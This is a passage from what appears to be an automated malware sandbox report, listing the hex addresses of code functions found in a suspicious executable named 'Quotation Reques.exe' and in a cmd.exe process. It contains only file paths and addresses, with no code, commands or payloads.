          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012425DD6_2_012425DD
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118841F6_2_0118841F
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012310026_2_01231002
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123D4666_2_0123D466
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118B0906_2_0118B090
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012420A86_2_012420A8
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A20A06_2_011A20A0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012428EC6_2_012428EC
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01242B286_2_01242B28
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AEBB06_2_011AEBB0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01241FF16_2_01241FF1
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123DBD26_2_0123DBD2
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01196E306_2_01196E30
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012422AE6_2_012422AE
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01242EF76_2_01242EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038D80316_2_0038D803
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038E04016_2_0038E040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00389CF016_2_00389CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A5CEA16_2_003A5CEA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003848E616_2_003848E6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A350616_2_003A3506
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0039196916_2_00391969
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0039655016_2_00396550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038719016_2_00387190
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A31DC16_2_003A31DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038FA3016_2_0038FA30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038522616_2_00385226
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00385E7016_2_00385E70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00388AD716_2_00388AD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038CB4816_2_0038CB48
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A6FF016_2_003A6FF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00395FC816_2_00395FC8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03082B2816_2_03082B28
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307DBD216_2_0307DBD2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030703DA16_2_030703DA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEEBB016_2_02FEEBB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030822AE16_2_030822AE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE20A016_2_02FE20A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FCB09016_2_02FCB090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307100216_2_03071002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0308E82416_2_0308E824
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030820A816_2_030820A8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FD412016_2_02FD4120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030828EC16_2_030828EC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBF90016_2_02FBF900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0308DFCE16_2_0308DFCE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FD6E3016_2_02FD6E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03081FF116_2_03081FF1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307D61616_2_0307D616
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03082EF716_2_03082EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03082D0716_2_03082D07
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03081D5516_2_03081D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030825DD16_2_030825DD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC841F